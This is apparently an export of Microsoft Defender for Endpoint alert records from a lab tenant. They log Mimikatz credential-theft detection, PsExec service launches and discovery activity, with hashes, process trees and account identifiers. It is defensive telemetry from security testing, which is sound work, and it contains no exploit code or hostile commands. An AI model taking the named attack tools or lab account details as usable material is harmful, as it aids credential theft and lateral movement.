[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:16:01.5966667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:16:01.5966667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-09-30T06:16:01.5966667Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.9", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:16:01.5966667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-09-15T03:19:37.3201866Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 624, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-09-30T06:13:03.9136767Z", "processId": 8072, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:16:01.5966667Z", "fileName": "ntoskrnl.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": "2022-09-15T03:19:28.401449Z", "processId": 4, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "16b6990ada0b0ccee28440afc00f9aa6bdc45f62", "sha256": "cc9b3a6c057ca31d0886c8efb7965a4c47e2d80fd0185d9b9fa55c5dc1d0dc55", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930212799134_-270199467
67e70048-1466-4a32-83ce-4b5a518a3324
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:41.2799368Z
2022-11-21T03:45:17.6166667Z
2022-11-21T03:45:17.4759763Z
2022-11-21T02:01:44.3120047Z
2022-11-21T02:33:53.306249Z
Mimikatz credential theft tool
The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user.
CredentialAccess
Resolved
High
50
SuccessfullyRemediated
null
null
WindowsDefenderAv
8cac979e-6dcc-44ad-8355-480eebaff1c1
null
null
Mimikatz
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:03:41.3233333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:14:25.5266667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072958472701689_-563268025
9889b340-9a4a-43d9-8023-6c7f714f5e6a
975
MicrosoftDefenderForEndpoint
2022-12-22T08:50:47.270188Z
2022-12-22T09:03:14.7633333Z
null
2022-12-22T08:28:11.2789495Z
2022-12-22T08:47:53.8002928Z
Suspicious sequence of exploration activities
A process called a set of windows commands. These commands can be used by attackers in order to identify assets of value and coordinate lateral movement after compromising a machine.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
acfdcbd1-cf72-47be-8e52-6cadc507656d
null
null
null
[ "T1016", "T1018", "T1049", "T1069.001", "T1069.002", "T1087", "T1087.001", "T1135" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Low", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:50:47.2866667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045931511124826_-2037955442
72e5ed84-28b4-4e06-b94e-0fc890c34332
765
MicrosoftDefenderForEndpoint
2022-11-21T02:05:51.1125047Z
2022-11-21T02:07:53.5833333Z
null
2022-11-21T01:55:47.8840459Z
2022-11-21T02:02:27.3917772Z
Suspicious System Owner/User Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1059.001", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:05:51.15Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:05:51.15Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:05:51.15Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930747994441_1210227961
95e31a58-67f4-46fc-b97b-22ec124abe7c
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:34.7994582Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:02:06.2897012Z
2022-11-21T02:33:42.4743653Z
Suspicious service launched
A suspicious service was started on this device. Attackers might use services to launch malicious commands or programs. This technique is used to maintain persistence or elevate privileges on the target device.
Execution
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
a5af9713-6eea-4d23-9bdc-9cab19f19092
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1569.002" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "MDE-Management", "semi auto", "servers" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:02:06.2012631Z", "processId": 7692, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:34.8433333Z", "fileName": "services.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:18.9649669Z", "parentProcessFileName": "wininit.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32", "parentProcessId": 564, "processCommandLine": "services.exe", "processCreationTime": "2022-11-16T03:32:19.0279725Z", "processId": 620, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "d7a213f3cfee2a8a191769eb33847953be51de54", "sha256": "dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:34.91Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:02:27.7361869Z", "processId": 5760, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:09:15.0633333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:06:14.4989431Z", "processId": 4572, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:09:15.2433333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:05:52.817905Z", "processId": 7684, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:16:03Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:12:11.2117933Z", "processId": 1984, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:16:03.64Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:11:49.6251097Z", "processId": 5300, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:33.69Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:14:30.1674201Z", "processId": 9008, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:17:34.3766667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:14:08.7063722Z", "processId": 5592, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:19:04.4966667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:16:27.1164549Z", "processId": 7888, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:20:59.5533333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:16:05.8519522Z", "processId": 6764, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:23:12.2066667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:22:22.878082Z", "processId": 8064, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:28:04.9Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:24:45.5696509Z", "processId": 6984, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:33:30.69Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:31:41.876943Z", "processId": 9664, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:33:31.7733333Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:31:20.3075634Z", "processId": 456, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", 